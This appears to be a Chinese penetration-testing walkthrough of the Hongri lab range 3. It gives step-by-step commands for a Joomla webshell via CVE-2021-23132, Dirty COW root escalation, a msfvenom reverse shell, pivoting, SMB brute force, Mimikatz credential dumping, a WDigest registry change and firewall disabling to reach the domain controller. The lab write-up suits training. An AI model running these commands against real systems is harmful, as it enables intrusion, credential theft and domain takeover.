内网渗透实战教学：红日靶场三渗透测试全流程<\/h1>

一、环境准备与网络拓扑<\/h2>

1. 网络配置<\/h3>

外网段<\/strong>：192.168.57.0\/24 (NAT模式)<\/li>
内网段<\/strong>：192.168.93.0\/24 (仅主机模式)<\/li>

VMnet配置<\/strong>：必须为内网段配置VMnet3，否则路由设置会出问题<\/li> <\/ul>
2. 靶机组成<\/h3>

外网机器：Ubuntu (192.168.57.145)<\/li>
内网机器：

域控：WIN-8GA56TNV3MV (192.168.93.10)<\/li>
WIN2008服务器 (192.168.93.20)<\/li>
WIN7主机 (192.168.93.30)<\/li> <\/ul> <\/li> <\/ul>
二、外网渗透阶段<\/h2>
1. 信息收集<\/h3>

端口扫描<\/strong>：<\/p>
nmap -sS 192.168.57.145 <\/span><\/span><\/code><\/pre>发现开放端口：80(HTTP)、3306(MySQL)等<\/p> <\/li> Web应用识别<\/strong>：<\/p> 使用Joomscan识别CMS版本： joomscan -u http:\/\/192.168.57.145 <\/span><\/span><\/code><\/pre><\/li> 确认Joomla版本：3.9.12<\/li> <\/ul> <\/li> 目录扫描<\/strong>：<\/p> 使用dirmap发现敏感文件： \/1.php - 包含配置信息<\/li> \/configuration.php~ - 包含数据库凭据<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 2. 数据库利用<\/h3> 连接MySQL<\/strong>：<\/p> 使用Navicat或命令行连接： mysql -h 192.168.57.145 -u [<\/span>username]<\/span> -p[<\/span>password]<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 提取管理员凭据<\/strong>：<\/p> 查询joomla<\/code>数据库中的am2zu_users<\/code>表<\/li> 获取超级用户哈希：$2y$10$OLQJ\/GnhLJR\/AqLsSk1hFOyqL8TxGG2r9R3QeRCibGCQGj6ZyJvCe<\/code><\/li> 使用密码123456<\/code>成功登录后台<\/li> <\/ul> <\/li> <\/ol> 3. 漏洞利用(CVE-2021-23132)<\/h3> 漏洞复现步骤<\/strong>：<\/p> 进入Media → Options<\/li> 修改文件路径实现目录遍历<\/li> 在\/templates\/beez3\/error.php<\/code>写入一句话木马<\/li> <\/ul> <\/li> Webshell连接<\/strong>：<\/p> 使用蚁剑连接： http:\/\/192.168.57.145\/templates\/beez3\/error.php <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 4. 绕过disable_functions<\/h3> 使用蚁剑插件绕过限制<\/li> 选择适当的绕过模式并执行<\/li> <\/ul> 5. 内网发现<\/h3> 执行ifconfig<\/code>发现新网段：192.168.93.120\/24<\/li> 确认存在反向代理架构<\/li> <\/ul> 6. SSH横向移动<\/h3> 凭据发现<\/strong>：<\/p> 在\/tmp\/mysql\/test.txt<\/code>找到SSH凭据<\/li> <\/ul> <\/li> SSH登录<\/strong>：<\/p> ssh [<\/span>username]<\/span>@192.168.57.145 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 7. 权限提升(脏牛漏洞)<\/h3> 漏洞利用<\/strong>： gcc -pthread dirty.c -o dirty -lcrypt <\/span><\/span>.\/dirty <\/span><\/span><\/code><\/pre><\/li> 结果<\/strong>：创建新用户firefart<\/code>，密码123456<\/code><\/li> 获得root权限<\/li> <\/ul> <\/li> <\/ol> 8. 上线MSF<\/h3> 生成payload<\/strong>：<\/p> msfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.57.128 LPORT=<\/span>5555<\/span> -f elf -o shell.elf <\/span><\/span><\/code><\/pre><\/li> 监听设置<\/strong>：<\/p> use exploit\/multi\/handler <\/span><\/span>set payload linux\/x64\/meterpreter\/reverse_tcp <\/span><\/span>set LHOST 192.168.57.128 <\/span><\/span>set LPORT 5555<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> <\/ol> 三、内网渗透阶段<\/h2> 1. 路由与代理配置<\/h3> 添加路由<\/strong>：<\/p> route add 192.168.93.0 255.255.255.0 [<\/span>session_id]<\/span> <\/span><\/span><\/code><\/pre><\/li> 设置SOCKS代理<\/strong>：<\/p> use auxiliary\/server\/socks_proxy <\/span><\/span>set version 4a <\/span><\/span>set srvport 8989<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. 内网信息收集<\/h3> 主机发现<\/strong>：<\/p> 使用MSF的arp_scanner<\/code>模块扫描192.168.93.0\/24网段<\/li> <\/ul> <\/li> 端口扫描<\/strong>：<\/p> use auxiliary\/scanner\/portscan\/tcp <\/span><\/span>set RHOSTS 192.168.93.10 192.168.93.20 192.168.93.30 <\/span><\/span>set PORTS 1-10000 <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 横向移动(SMB爆破)<\/h3> 爆破WIN2008<\/strong>：<\/p> use auxiliary\/scanner\/smb\/smb_login <\/span><\/span>set RHOSTS 192.168.93.20 <\/span><\/span>set SMBUser administrator <\/span><\/span>set pass_file \/root\/dict\/pass.txt <\/span><\/span>run <\/span><\/span><\/code><\/pre> 获取密码：123qwe!ASD<\/code><\/li> <\/ul> <\/li> psexec横向<\/strong>：<\/p> use exploit\/windows\/smb\/psexec <\/span><\/span>set payload windows\/x64\/meterpreter\/bind_tcp <\/span><\/span>set SMBUser administrator <\/span><\/span>set SMBPass 123qwe!ASD <\/span><\/span>set RHOSTS 192.168.93.20 <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 域渗透<\/h3> 信息收集<\/strong>：<\/p> 确认域名为：test.org<\/li> 域控IP：192.168.93.10<\/li> <\/ul> <\/li> 凭据提取<\/strong>：<\/p> load kiwi <\/span><\/span>kiwi_cmd privilege::debug <\/span><\/span>kiwi_cmd sekurlsa::logonPasswords <\/span><\/span><\/code><\/pre> 获取域管密码：zxcASDqw123!!<\/code><\/li> <\/ul> <\/li> 域控横向<\/strong>：<\/p> 方法一：WMIexec proxychains4 python3 wmiexec.py -debug 'administrator:zxcASDqw123!!@192.168.93.10'<\/span> <\/span><\/span><\/code><\/pre><\/li> 方法二：关闭防火墙后psexec netsh advfirewall set allprofiles state off <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 四、关键技术与工具总结<\/h2> 1. 核心技术<\/h3> Joomla漏洞利用(CVE-2021-23132)<\/li> Linux提权(脏牛漏洞)<\/li> SMB协议利用(psexec\/wmiexec)<\/li> 域环境渗透技巧<\/li> <\/ul> 2. 主要工具<\/h3> 信息收集：nmap、Joomscan、dirmap<\/li> Webshell管理：蚁剑<\/li> 漏洞利用：MSF、自定义exploit<\/li> 横向移动：psexec、wmiexec.py<\/li> 凭据提取：Mimikatz(kiwi)<\/li> <\/ul> 3. 渗透流程总结<\/h3> 外网Web应用渗透<\/li> 获取初始立足点<\/li> 内网探测与横向移动<\/li> 权限提升与持久化<\/li> 域环境渗透与控制<\/li> <\/ol> 五、常见问题解决<\/h2> 反弹shell失败<\/strong>：<\/p> 检查网络架构，确认是否存在反向代理<\/li> 尝试bind shell替代reverse shell<\/li> <\/ul> <\/li> Mimikatz抓不到密码<\/strong>：<\/p> 尝试修改注册表后重新登录<\/li> <\/ul> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 \/f <\/span><\/span><\/code><\/pre> 重启或等待用户重新登录<\/li> <\/ul> <\/li> psexec横向失败<\/strong>：<\/p> 检查目标防火墙状态<\/li> 尝试替代方法如wmiexec或smbexec<\/li> <\/ul> <\/li> 代理设置问题<\/strong>：<\/p> 确保\/etc\/proxychains4.conf配置正确<\/li> 测试代理通道是否畅通<\/li> <\/ul> <\/li> <\/ol>